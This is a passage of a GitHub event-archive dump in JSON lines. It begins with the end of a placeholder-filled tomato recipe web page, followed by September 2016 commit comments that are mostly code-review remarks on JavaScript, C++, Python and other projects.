min.</p>\r\n\t<p>SERVE with crackers</p>\r\n</section>\r\n\r\n<section itemscope itemtype=\"\t\r\n\t<p itemprop=\"servingSize\">Nutrition Information Per Serving: <p itemprop=\"calories\">140 calories\r\n\t<p itemprop=\"fatContent\">3g total fat</p>\r\n\t<p itemprop=\"saturatedFatContent\">0.5g saturated fat</p>\r\n\t<p itemprop=\"sodiumContent\">340mg sodium</p> \r\n\t<p itemprop=\"carbohydrateContent\">24g carbohydrate</p>\r\n\t<p itemprop=\"fiberContent\">1g dietary fiber</p>\r\n\t<p  itemprop=\"proteinContent\">3g protein</p>\r\n</section>\r\n\r\n<section>\r\n<h2>Tomato Lovers Corner</h2>\r\n<p>I love my tomatoes and thought I would share my latest experience. Lorem Ipsum is simply dummy text of the printing and typesetting industry.Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book</p>\r\n</section>\r\n\r\n\t<article itemscope itemtype=\"http://schema.org/Organization\">\r\n<section>\r\n<h2>About Us</h2>\r\n<h3>The Company</h3>\r\n<p itemprop=\"name\">Tomato Toma-toe</p> <p>has been in business for one year.Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book</p>\r\n\r\n<h3>The CEO</h3>\r\n<p itemprop=\"founder\">Rachelle Edmond, owner.</p><p>Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book</p>\r\n</section>\r\n\r\n<section>\r\n<h2>Resource List</h2>\r\n<p>www.snackworks.com</p>\r\n<p>I found the Gazpacho Dip recipe on the back of one of their boxes for Mini Stoned Wheat Thins.</p>\r\n\r\n<p>www.alltomato.com</p>\r\n<p>Tomatoes- a tasty garden test. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book</p>\r\n</section>\r\n\r\n</main>\r\n\r\n<aside>\r\n<h3>Events</h3>\r\n<p>Text will go here.</p>\r\n</aside>\r\n\r\n\r\n<footer>\r\n<h4>Contact Us:</h4>\r\n<address>\r\n<p itemprop=\"name\">Tomato Toma-toe</p>\r\n<p itemprop=\"address\">50002 New Lane</p>\r\n<p itemprop=\"address\">Los Angeles, CA 90032</p>\r\n<p itemprop=\"telephone\">866.334.5546</p>\r\n<p itemprop=\"email\">email@tomatotomatoe.com</p>\r\n</address>\r\n<small>all content &copy;copyright 2016 Tomato Toma-toe | please read about us <a href=\"#\">terms of use</a></small>\r\n</footer>\r\n\t</article>\r\n</article>\r\n</body>\r\n</html>"}},"created_at":"2016-09-14T05:33:51Z"}
{"id":"4559936156","type":"CommitCommentEvent","actor":{"login":"softexe"},"repo":{"name":"nolimits4web/Framework7"},"payload":{"comment":{"id":19012946,"position":null,"line":null,"path":null,"commit_id":"eab78826a4d34a0cb24e492d9b0ca44cfe3398d6","created_at":"2016-09-14T05:34:20Z","updated_at":"2016-09-14T05:34:20Z","body":"Я сделал определение, какая панель выдвигается в момент свайпа - если свайп слева направо в у левой границы - то левая панель, если справа налево у правой - то правая."}},"created_at":"2016-09-14T05:34:20Z"}
{"id":"4559940848","type":"CommitCommentEvent","actor":{"login":"atamariya"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":19012955,"position":null,"line":null,"path":null,"commit_id":"f9669b34d7203692aa165c5ec71ecd2c541aa177","created_at":"2016-09-14T05:36:16Z","updated_at":"2016-09-14T05:36:16Z","body":"@ExSport ffmpeg doesn't support 2+ channels in MP3. https://evilsoup.wordpress.com/2013/02/10/general-ffmpeg-encoding-guide-2/ . There was another reference in ffmpeg mailing list that I read once."}},"created_at":"2016-09-14T05:36:16Z"}
{"id":"4559942574","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"bkwsuper24/react-starter"},"payload":{"comment":{"id":19012960,"position":null,"line":null,"path":null,"commit_id":"9aede761f1faf4b94ab5f4e42435d0ddf47a1a3d","created_at":"2016-09-14T05:36:55Z","updated_at":"2016-09-14T05:36:55Z","body":":clap:"}},"created_at":"2016-09-14T05:36:55Z"}
{"id":"4559943447","type":"CommitCommentEvent","actor":{"login":"Tadalafellas"},"repo":{"name":"Arkilus/hello"},"payload":{"comment":{"id":19012965,"position":null,"line":null,"path":null,"commit_id":"efde37971d234379943a8f2a8babafc5292458a4","created_at":"2016-09-14T05:37:17Z","updated_at":"2016-09-14T05:37:17Z","body":"yo fam"}},"created_at":"2016-09-14T05:37:17Z"}
{"id":"4559944248","type":"CommitCommentEvent","actor":{"login":"Arkilus"},"repo":{"name":"Arkilus/hello"},"payload":{"comment":{"id":19012967,"position":null,"line":null,"path":null,"commit_id":"efde37971d234379943a8f2a8babafc5292458a4","created_at":"2016-09-14T05:37:37Z","updated_at":"2016-09-14T05:37:37Z","body":"yo kapooya"}},"created_at":"2016-09-14T05:37:37Z"}
{"id":"4559945987","type":"CommitCommentEvent","actor":{"login":"peterhgao"},"repo":{"name":"varun-r/sfdat26_work"},"payload":{"comment":{"id":19012969,"position":null,"line":null,"path":null,"commit_id":"543d5d4b2883634e4a1ca907841886c40860defe","created_at":"2016-09-14T05:38:18Z","updated_at":"2016-09-14T05:38:18Z","body":"**HW 1 Feedback**\r\n\r\n**More tasty**\r\n- Nice job getting the joins to work without losing data\r\n- You can also use parse_dates=['date'] in order to parse that column into a date. (as alternative to the lambda and indexing to get the month)\r\n- I like the comment about your zip code 94133\r\n\r\n**A Little More Morbid**\r\n- #7 - Instead of manually computing you could do something like: killings.armed[killings.armed == 'No'].value_counts() / len(killings)\r\n- #11 - to make this more readable and interpretable, consider adding parameters such as (figsize = (12,8), sharex = True, sharey = True)\r\n\r\n**Less Morbid**\r\n- #8 - similarly, add figsize and other parameters to your histogram\r\n- #9 - you don't need to 'group by' since 'major' is already unique in the dataset.\r\n\r\nNice work!"}},"created_at":"2016-09-14T05:38:18Z"}
{"id":"4559948195","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"zhewenw/react-starter"},"payload":{"comment":{"id":19012980,"position":3,"line":3,"path":"ui/action.js","commit_id":"d605ca93f755b306faf6b1ee96b870e121dfe81f","created_at":"2016-09-14T05:39:14Z","updated_at":"2016-09-14T05:39:14Z","body":"The convention is to actually define the types in a separate file from actions called `types.js`. This will allow you to do:\r\n\r\n    import * as types from './types';\r\n\r\nYou can get a more concise syntax if you export an object rather than exporting individual actions, like so:\r\n\r\n    export default {\r\n      LOAD_MOVIES: 'LOAD_MOVIES',\r\n      ...\r\n    }"}},"created_at":"2016-09-14T05:39:14Z"}
{"id":"4559948219","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19012981,"position":null,"line":null,"path":null,"commit_id":"00f7f571b5e7c2ef487c180b1b5ba4fde3dc6b8e","created_at":"2016-09-14T05:39:14Z","updated_at":"2016-09-14T05:39:14Z","body":"5626-Plant-HX-min-DT (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1190 of 1190 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-00f7f571b5e7c2ef487c180b1b5ba4fde3dc6b8e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-00f7f571b5e7c2ef487c180b1b5ba4fde3dc6b8e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-00f7f571b5e7c2ef487c180b1b5ba4fde3dc6b8e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-36.1%25-green.svg)</a>\n"}},"created_at":"2016-09-14T05:39:14Z"}
{"id":"4559948888","type":"CommitCommentEvent","actor":{"login":"peterjenkins1"},"repo":{"name":"SoneraCloud/ansible-role-users"},"payload":{"comment":{"id":19012982,"position":32,"line":91,"path":"tasks/main.yml","commit_id":"8e268f5a87ae44d96cced3ff1b688c2e9e8caf12","created_at":"2016-09-14T05:39:30Z","updated_at":"2016-09-14T05:39:30Z","body":"Yes! This is better and simpler! :-)"}},"created_at":"2016-09-14T05:39:30Z"}
{"id":"4559950069","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"zhewenw/react-starter"},"payload":{"comment":{"id":19012985,"position":10,"line":10,"path":"ui/action.js","commit_id":"d605ca93f755b306faf6b1ee96b870e121dfe81f","created_at":"2016-09-14T05:39:58Z","updated_at":"2016-09-14T05:39:58Z","body":"Naturally if you move the types to another file, you'll have to import them:\r\n\r\n    export function handleChanges(text) {\r\n      return { type: types.HANDLE_CHANGES, text };\r\n    }"}},"created_at":"2016-09-14T05:39:58Z"}
{"id":"4559952582","type":"CommitCommentEvent","actor":{"login":"tonelicoo"},"repo":{"name":"tonelicoo/legendary-happiness"},"payload":{"comment":{"id":19012987,"position":null,"line":null,"path":null,"commit_id":"dd447058ed191d28d950e7c6ea09860d9e2ec462","created_at":"2016-09-14T05:40:59Z","updated_at":"2016-09-14T05:40:59Z","body":"git clone --depth 1 https://github.com/neologd/mecab-ipadic-neologd.git"}},"created_at":"2016-09-14T05:40:59Z"}
{"id":"4559953852","type":"CommitCommentEvent","actor":{"login":"pwx5507690"},"repo":{"name":"pwx5507690/PCMS"},"payload":{"comment":{"id":19012990,"position":null,"line":null,"path":null,"commit_id":"d4cbec1c0ff4719ad1b922262ae60f759472a83d","created_at":"2016-09-14T05:41:33Z","updated_at":"2016-09-14T05:41:33Z","body":"marge"}},"created_at":"2016-09-14T05:41:33Z"}
{"id":"4559955212","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"zhewenw/react-starter"},"payload":{"comment":{"id":19012993,"position":23,"line":19,"path":"ui/reducer.js","commit_id":"d605ca93f755b306faf6b1ee96b870e121dfe81f","created_at":"2016-09-14T05:42:06Z","updated_at":"2016-09-14T05:42:06Z","body":"The problem with your `default` case is that if you ever dispatch an action that doesn't match - which is a common pattern when you have multiple reducers - that you'll reset your current state. Really, you should be setting an initial state rather than a default state:\r\n\r\n    reducer(state = initialState, action)\r\n\r\nYour default case would then be to simple `return state`."}},"created_at":"2016-09-14T05:42:06Z"}
{"id":"4559958276","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"zhewenw/react-starter"},"payload":{"comment":{"id":19012996,"position":38,"line":25,"path":"ui/app.jsx","commit_id":"d605ca93f755b306faf6b1ee96b870e121dfe81f","created_at":"2016-09-14T05:43:23Z","updated_at":"2016-09-14T05:43:23Z","body":"You seem to be using `state` and `props` interchangeably, be careful here."}},"created_at":"2016-09-14T05:43:23Z"}
{"id":"4559958342","type":"CommitCommentEvent","actor":{"login":"bengott"},"repo":{"name":"meteor/blaze"},"payload":{"comment":{"id":19012997,"position":null,"line":null,"path":null,"commit_id":"6af0a1b1b63e93c7bd639fe07e5c934ad7f1c0a4","created_at":"2016-09-14T05:43:25Z","updated_at":"2016-09-14T05:43:25Z","body":"So running Hexo locally was easier than expected... :) My suggested changes fixed the links as expected.  Submitted PR #99, and @mitar already merged it."}},"created_at":"2016-09-14T05:43:25Z"}
{"id":"4559958573","type":"CommitCommentEvent","actor":{"login":"tonelicoo"},"repo":{"name":"tonelicoo/legendary-happiness"},"payload":{"comment":{"id":19012998,"position":null,"line":null,"path":null,"commit_id":"dd447058ed191d28d950e7c6ea09860d9e2ec462","created_at":"2016-09-14T05:43:30Z","updated_at":"2016-09-14T05:43:30Z","body":"git init\r\n"}},"created_at":"2016-09-14T05:43:30Z"}
{"id":"4559959022","type":"CommitCommentEvent","actor":{"login":"fritsvanveen"},"repo":{"name":"fritsvanveen/QGIS"},"payload":{"comment":{"id":19012999,"position":null,"line":null,"path":null,"commit_id":"eb0eb126be659c9aa5d1ecbde5ab499dfb494543","created_at":"2016-09-14T05:43:42Z","updated_at":"2016-09-14T05:43:42Z","body":"@nyalldawson I issued a PR, but there are merge conflicts. Not sure if Travis will run now. I better try to update my fork with the master. After the weekend I have some time again."}},"created_at":"2016-09-14T05:43:42Z"}
{"id":"4559959455","type":"CommitCommentEvent","actor":{"login":"dingxu"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19013001,"position":339,"line":339,"path":"shishuo/line-monitoring-map.js","commit_id":"10e74a705b7aff8eda20a018ac621a6f6de22964","created_at":"2016-09-14T05:43:53Z","updated_at":"2016-09-14T05:43:53Z","body":"分号+2。。。。。"}},"created_at":"2016-09-14T05:43:53Z"}
{"id":"4559961011","type":"CommitCommentEvent","actor":{"login":"tonelicoo"},"repo":{"name":"tonelicoo/legendary-happiness"},"payload":{"comment":{"id":19013002,"position":null,"line":null,"path":null,"commit_id":"dd447058ed191d28d950e7c6ea09860d9e2ec462","created_at":"2016-09-14T05:44:31Z","updated_at":"2016-09-14T05:44:31Z","body":"$git init"}},"created_at":"2016-09-14T05:44:31Z"}
{"id":"4559963895","type":"CommitCommentEvent","actor":{"login":"bridiver"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19013011,"position":null,"line":null,"path":null,"commit_id":"fc90cd8f8c7fb3fdea388f2f5f291ffbfc40561b","created_at":"2016-09-14T05:45:40Z","updated_at":"2016-09-14T05:45:40Z","body":"++\r\nfyi - you can use `loadUrl` instead of load and then waitForUrl"}},"created_at":"2016-09-14T05:45:40Z"}
{"id":"4559967446","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"zhewenw/react-starter"},"payload":{"comment":{"id":19013015,"position":12,"line":12,"path":"ui/api.js","commit_id":"45417b2afa3463aed9a4a35533ea2e303f7f7fbf","created_at":"2016-09-14T05:47:09Z","updated_at":"2016-09-14T05:47:09Z","body":"    export async function fetchMovies(title) {\r\n      const response = await fetch(API + title);\r\n      const json = await response.json();\r\n      return json.Search;\r\n    }"}},"created_at":"2016-09-14T05:47:09Z"}
{"id":"4559968950","type":"CommitCommentEvent","actor":{"login":"dingxu"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19013017,"position":356,"line":356,"path":"shishuo/line-monitoring-map.js","commit_id":"10e74a705b7aff8eda20a018ac621a6f6de22964","created_at":"2016-09-14T05:47:43Z","updated_at":"2016-09-14T05:47:43Z","body":"```\r\nvar handler = isChecked ? \"showPolygon\" :  \"isShowCircle\";\r\n\r\nthis.setIsOpenFlag( isChecked );\r\nthis[ handler ](this.handOrAutoFlag, waveItems);\r\n```\r\nMaybe better~"}},"created_at":"2016-09-14T05:47:43Z"}
{"id":"4559968967","type":"CommitCommentEvent","actor":{"login":"martbhell"},"repo":{"name":"SoneraCloud/ansible-role-users"},"payload":{"comment":{"id":19013018,"position":32,"line":91,"path":"tasks/main.yml","commit_id":"8e268f5a87ae44d96cced3ff1b688c2e9e8caf12","created_at":"2016-09-14T05:47:43Z","updated_at":"2016-09-14T05:47:43Z","body":"I have some suspicion that this didn't work for my hackish multiple ssh-keys per user by using { newline } but it seems to work for the root user at least."}},"created_at":"2016-09-14T05:47:43Z"}
{"id":"4559969377","type":"CommitCommentEvent","actor":{"login":"cyberium"},"repo":{"name":"Phatcat/mangos-wotlk"},"payload":{"comment":{"id":19013019,"position":null,"line":null,"path":null,"commit_id":"5d41f8e712315c7ecb6d78635e6a3de20ed1b653","created_at":"2016-09-14T05:47:53Z","updated_at":"2016-09-14T05:47:53Z","body":"This is not correct.\r\nWe dont have to 'force' guardian's pet to enter evade.\r\nHere is a bad case were this logic will fails\r\n2 players,\r\nplayer1 is fighting the master\r\nplayer 2 is fighting the pet\r\nif player 1 put the master in evade mode, the pet will stop combat with player 2 in any case.\r\nA better behavior is that the master should go help its pet.\r\n\r\nTo do what you want (wich i know why i failed to do it, its because i focused to player's pet) you have to implement evade on distance too big from combat start and evade on enemy not accessible. I think we already have some code about that first case not sure for the second case. \r\nI mean eventAI should already be designed to handle first case and i just may broked that logic in guardianAI."}},"created_at":"2016-09-14T05:47:53Z"}
{"id":"4559972138","type":"CommitCommentEvent","actor":{"login":"joergoster"},"repo":{"name":"VoyagerOne/Stockfish"},"payload":{"comment":{"id":19013031,"position":null,"line":null,"path":null,"commit_id":"6611430095fc82b427b1d42208d928036c9c5c44","created_at":"2016-09-14T05:48:59Z","updated_at":"2016-09-14T05:48:59Z","body":"Congrats!"}},"created_at":"2016-09-14T05:48:59Z"}
{"id":"4559974661","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"zhewenw/react-starter"},"payload":{"comment":{"id":19013035,"position":17,"line":19,"path":"ui/setup.jsx","commit_id":"45417b2afa3463aed9a4a35533ea2e303f7f7fbf","created_at":"2016-09-14T05:49:59Z","updated_at":"2016-09-14T05:49:59Z","body":"This is fine to get you unblocked but you shouldn't be attaching multiple saga middlewares to your redux store. One should suffice."}},"created_at":"2016-09-14T05:49:59Z"}
{"id":"4559976227","type":"CommitCommentEvent","actor":{"login":"cyberium"},"repo":{"name":"Phatcat/mangos-wotlk"},"payload":{"comment":{"id":19013037,"position":23,"line":308,"path":"src/game/AI/PetAI.cpp","commit_id":"ed06e77cb296f3858acde3c276e982ffdc1bf8c1","created_at":"2016-09-14T05:50:34Z","updated_at":"2016-09-14T05:50:34Z","body":"if m_creature is called m_CREATURE this probably mean its a TYPE_UNIT so dont check that here."}},"created_at":"2016-09-14T05:50:34Z"}
{"id":"4559981895","type":"CommitCommentEvent","actor":{"login":"cyberium"},"repo":{"name":"Phatcat/mangos-wotlk"},"payload":{"comment":{"id":19013047,"position":15,"line":36,"path":"src/game/AI/ReactorAI.cpp","commit_id":"e4928d20a0680a68d73c8e41417cd3d9e0234c80","created_at":"2016-09-14T05:52:41Z","updated_at":"2016-09-14T05:52:41Z","body":"pull all those cosmetic change out of this commit"}},"created_at":"2016-09-14T05:52:41Z"}
{"id":"4559987098","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/electron"},"payload":{"comment":{"id":19013055,"position":null,"line":null,"path":null,"commit_id":"e31e27cff89abe428fe1001d9b4b3f2ba927aa2f","created_at":"2016-09-14T05:54:43Z","updated_at":"2016-09-14T05:54:43Z","body":"++"}},"created_at":"2016-09-14T05:54:43Z"}
{"id":"4559994232","type":"CommitCommentEvent","actor":{"login":"vvvxo"},"repo":{"name":"highsea/Hosts"},"payload":{"comment":{"id":19013070,"position":null,"line":null,"path":null,"commit_id":"3fa732acfa358de123cb00ac878b7184737870de","created_at":"2016-09-14T05:57:19Z","updated_at":"2016-09-14T05:57:19Z","body":"-\n\nditingfujun <notifications@github.com>于2016年9月8日 周四 17:05写道：\n\n> i need it\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/highsea/Hosts/commit/3fa732acfa358de123cb00ac878b7184737870de#commitcomment-18941709>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AM6EY3-9UHXGlWz-kFqdTnHMeE2adGEZks5qn8_AgaJpZM4J3xJY>\n> .\n>\n"}},"created_at":"2016-09-14T05:57:19Z"}
{"id":"4559994774","type":"CommitCommentEvent","actor":{"login":"lizhdo"},"repo":{"name":"ArduPilot/ardupilot"},"payload":{"comment":{"id":19013073,"position":1,"line":1,"path":"modules/mavlink","commit_id":"f19a129015bd6fae9c65eaebd0f6a4db4d81eb35","created_at":"2016-09-14T05:57:29Z","updated_at":"2016-09-14T05:57:29Z","body":"e0f56de31cad7a592e1bdcae88825cbb5698c79d"}},"created_at":"2016-09-14T05:57:29Z"}
{"id":"4559995597","type":"CommitCommentEvent","actor":{"login":"aa65535"},"repo":{"name":"shadowsocks/luci-app-shadowsocks"},"payload":{"comment":{"id":19013074,"position":null,"line":null,"path":null,"commit_id":"181a96b5a424ff5e3443aab40df04d4c0f856393","created_at":"2016-09-14T05:57:47Z","updated_at":"2016-09-14T05:57:47Z","body":"https://github.com/shadowsocks/luci-app-shadowsocks/wiki/Use-UCI-system"}},"created_at":"2016-09-14T05:57:47Z"}
{"id":"4560001863","type":"CommitCommentEvent","actor":{"login":"peterhgao"},"repo":{"name":"kateWhee1/sfdat26_work"},"payload":{"comment":{"id":19013084,"position":null,"line":null,"path":null,"commit_id":"aaee3d562b3604f16e7fbd8f17cc8ad90cbe7950","created_at":"2016-09-14T05:59:41Z","updated_at":"2016-09-14T05:59:41Z","body":"**HW 1 Feedback**\r\n\r\n**More tasty**\r\n- Nice job doing merges in 1 step with outer joins to preserve data.\r\n- Your inspection counts (#2, #3) are a bit off because you're doing nunique() on date. Instead, consider creating an index column (inspections['inspection_id']=inspections.index), and doing nunique() on inspection_id within your combined_df.\r\n- In your data loads, you can also use parse_dates=['date'] in order to parse that column into a date. (as alternative to the lambda and math function in #4)\r\n- #7 - For this question, assuming a violation_id was created, you could do: restaurant_scores[restaurant_scores.type == 'New Ownership'].groupby('risk_category').violation_id.nunique()\r\n\r\n**A Little More Morbid**\r\n- #11 - to make this more readable, you can add figsize = (12,8)\r\n\r\n**Less Morbid**\r\n- #3, #4 - groupby('Major') can be removed since Major is unique in the dataset \r\n\r\nNice work Kate!"}},"created_at":"2016-09-14T05:59:41Z"}
{"id":"4560007137","type":"CommitCommentEvent","actor":{"login":"Exoow"},"repo":{"name":"Exoow/SikuliSharp"},"payload":{"comment":{"id":19013120,"position":null,"line":null,"path":null,"commit_id":"5412fad39ffdaa326c753573424baaff33ac668b","created_at":"2016-09-14T06:01:19Z","updated_at":"2016-09-14T06:01:19Z","body":"Culture invariant string.Format for ToSikuliScript()"}},"created_at":"2016-09-14T06:01:19Z"}
{"id":"4560009339","type":"CommitCommentEvent","actor":{"login":"spl"},"repo":{"name":"leanprover/lean"},"payload":{"comment":{"id":19013131,"position":11,"line":11,"path":"tests/lean/run/let3.lean","commit_id":"0b90ace9f8b284b7ef96d826a42842ac58dcadec","created_at":"2016-09-14T06:02:07Z","updated_at":"2016-09-14T06:02:07Z","body":"Just as far as English semantics go, I intuitively understand what it means to `obtain <something> from <something else>`, but I struggle trying to understand how to `obtain <something> in <something else>`."}},"created_at":"2016-09-14T06:02:07Z"}
{"id":"4560010143","type":"CommitCommentEvent","actor":{"login":"dingxu"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19013135,"position":367,"line":367,"path":"shishuo/line-monitoring-map.js","commit_id":"10e74a705b7aff8eda20a018ac621a6f6de22964","created_at":"2016-09-14T06:02:24Z","updated_at":"2016-09-14T06:02:24Z","body":"{}并不会更改上下文，为什么在这里定义了一个_this？我看你前面并不是这种风格."}},"created_at":"2016-09-14T06:02:24Z"}
{"id":"4560010454","type":"CommitCommentEvent","actor":{"login":"cyberium"},"repo":{"name":"Phatcat/mangos-wotlk"},"payload":{"comment":{"id":19013136,"position":5,"line":147,"path":"src/game/AI/CreatureAI.cpp","commit_id":"e4928d20a0680a68d73c8e41417cd3d9e0234c80","created_at":"2016-09-14T06:02:30Z","updated_at":"2016-09-14T06:02:30Z","body":"Have to verify but iam sure checking UNIT_FLAG_DISABLE_MOVE and/or UNIT_STAT_CAN_NOT_MOVE is redundant. I repeat the logic should be we need to check the curent state of the creature so we have to use UNIT_STAT only. I think we have to remove all UNIT_FLAG read from the core because those flags should be managed only in some specific place and depend only of the current unit state. Tell me if you think iam wrong."}},"created_at":"2016-09-14T06:02:30Z"}
{"id":"4560016751","type":"CommitCommentEvent","actor":{"login":"thebigsmileXD"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":19013148,"position":39,"line":63,"path":"src/pocketmine/command/defaults/XpCommand.php","commit_id":"049aded7c4abfab7f4bef666f93253fbaa3b9021","created_at":"2016-09-14T06:04:47Z","updated_at":"2016-09-14T06:04:47Z","body":"checked. Will search that event."}},"created_at":"2016-09-14T06:04:47Z"}
{"id":"4560016784","type":"CommitCommentEvent","actor":{"login":"bjansen"},"repo":{"name":"ceylon/ceylon"},"payload":{"comment":{"id":19013149,"position":14,"line":40,"path":"language/src/ceylon/language/StringBuilder.ceylon","commit_id":"c3ac9afe0c2d02b1967ffe7234b343994fa9a544","created_at":"2016-09-14T06:04:48Z","updated_at":"2016-09-14T06:04:48Z","body":"master *is* the 1.3.0 branch, `version-1-3-0` was only created to bump versions and was merged back to master."}},"created_at":"2016-09-14T06:04:48Z"}
{"id":"4560017473","type":"CommitCommentEvent","actor":{"login":"LathaPaidi"},"repo":{"name":"LathaPaidi/SampleRepository"},"payload":{"comment":{"id":19013152,"position":5,"line":27,"path":"CalculatorApp/CalculatorLib/Calculator.cs","commit_id":"29ce1b3724f6f59da671b4ec3296f813e9ca96bb","created_at":"2016-09-14T06:05:04Z","updated_at":"2016-09-14T06:05:04Z","body":"test"}},"created_at":"2016-09-14T06:05:04Z"}
{"id":"4560021025","type":"CommitCommentEvent","actor":{"login":"nicolas-raoul"},"repo":{"name":"alemela/wiki-needs-pictures"},"payload":{"comment":{"id":19013158,"position":91,"line":91,"path":"backend/projects/wikidata.js","commit_id":"899085167811a37695ab101d4b3b2a5de524f4f1","created_at":"2016-09-14T06:06:08Z","updated_at":"2016-09-14T06:06:08Z","body":"So, is Wikidata import currently disabled? Is this the latest code? Thanks :-)"}},"created_at":"2016-09-14T06:06:08Z"}
{"id":"4560022729","type":"CommitCommentEvent","actor":{"login":"clyfe"},"repo":{"name":"dakrone/clj-http"},"payload":{"comment":{"id":19013161,"position":null,"line":null,"path":null,"commit_id":"7ec10113776655d04234edcb3238a5a50943980a","created_at":"2016-09-14T06:06:45Z","updated_at":"2016-09-14T06:06:45Z","body":"The first one I saw in Rails more often and second in PHP more often, but they work vice versa too afaict."}},"created_at":"2016-09-14T06:06:45Z"}
{"id":"4560024588","type":"CommitCommentEvent","actor":{"login":"pongsakornsemsuwan"},"repo":{"name":"pongsakornsemsuwan/brownbox"},"payload":{"comment":{"id":19013164,"position":null,"line":null,"path":null,"commit_id":"1d78fd7cb150568d54a422801629dee4f1e58ef9","created_at":"2016-09-14T06:07:23Z","updated_at":"2016-09-14T06:07:23Z","body":"เหมือนกันนะ ดูตัวอย่าง\r\n\r\nhttp://blog.krawaller.se/posts/a-react-redux-example-app/\r\n\r\nแต่โค้ดน่าจะอ่านยากขึ้นสำหรับคนพึ่งหัด (ต้องไปดูว่า mapDispatchToProps() ) ทำอะไร"}},"created_at":"2016-09-14T06:07:23Z"}
{"id":"4560027392","type":"CommitCommentEvent","actor":{"login":"clyfe"},"repo":{"name":"dakrone/clj-http"},"payload":{"comment":{"id":19013173,"position":null,"line":null,"path":null,"commit_id":"7ec10113776655d04234edcb3238a5a50943980a","created_at":"2016-09-14T06:08:22Z","updated_at":"2016-09-14T06:08:22Z","body":"Note this change also applies to map params:\r\n\r\n```\r\nhttp://example.com?field[foo]=a&field[bar]=b&field[baz]=c\r\n```"}},"created_at":"2016-09-14T06:08:22Z"}
{"id":"4560033547","type":"CommitCommentEvent","actor":{"login":"mariofajardo"},"repo":{"name":"KipCrossing/ServerLogin"},"payload":{"comment":{"id":19013182,"position":null,"line":null,"path":null,"commit_id":"266e5707bd7a4b8d5986c000f992c7e208c6aacf","created_at":"2016-09-14T06:10:25Z","updated_at":"2016-09-14T06:10:25Z","body":"uh fancy.. :)"}},"created_at":"2016-09-14T06:10:25Z"}
{"id":"4560034853","type":"CommitCommentEvent","actor":{"login":"cyberium"},"repo":{"name":"Phatcat/mangos-wotlk"},"payload":{"comment":{"id":19013186,"position":36,"line":148,"path":"src/game/AI/AggressorAI.cpp","commit_id":"e4928d20a0680a68d73c8e41417cd3d9e0234c80","created_at":"2016-09-14T06:10:51Z","updated_at":"2016-09-14T06:10:51Z","body":"Can you verify if those check are not already done before the main call to creature->Attack()?\r\n"}},"created_at":"2016-09-14T06:10:51Z"}
{"id":"4560037283","type":"CommitCommentEvent","actor":{"login":"andrewda"},"repo":{"name":"FRCTools/Attendance-Client"},"payload":{"comment":{"id":19013189,"position":5,"line":22,"path":"app/assets/js/main.js","commit_id":"dd8e0e7a6cbb84f613d93065244552d9d0161eaf","created_at":"2016-09-14T06:11:39Z","updated_at":"2016-09-14T06:11:39Z","body":"We might want to add an `if (killTime)` to allow a 0 killTime to disable it"}},"created_at":"2016-09-14T06:11:39Z"}
{"id":"4560037320","type":"CommitCommentEvent","actor":{"login":"Pavel514302"},"repo":{"name":"Pavel514302/Project"},"payload":{"comment":{"id":19013190,"position":null,"line":null,"path":null,"commit_id":"589d1f82e00df3718a6127b2b7581ed68b8a5748","created_at":"2016-09-14T06:11:40Z","updated_at":"2016-09-14T06:11:40Z","body":"first commit"}},"created_at":"2016-09-14T06:11:40Z"}
{"id":"4560039687","type":"CommitCommentEvent","actor":{"login":"seanastephens"},"repo":{"name":"communityshare/communityshare"},"payload":{"comment":{"id":19013195,"position":42,"line":48,"path":"community_share/api/analytics/views/record_view.py","commit_id":"877313f95b79fa954964cee6fcd5e41d109f51e3","created_at":"2016-09-14T06:12:27Z","updated_at":"2016-09-14T06:12:27Z","body":"`len('/admin') == 6`, which will be an actual path if you take out the `/#`... meh."}},"created_at":"2016-09-14T06:12:27Z"}
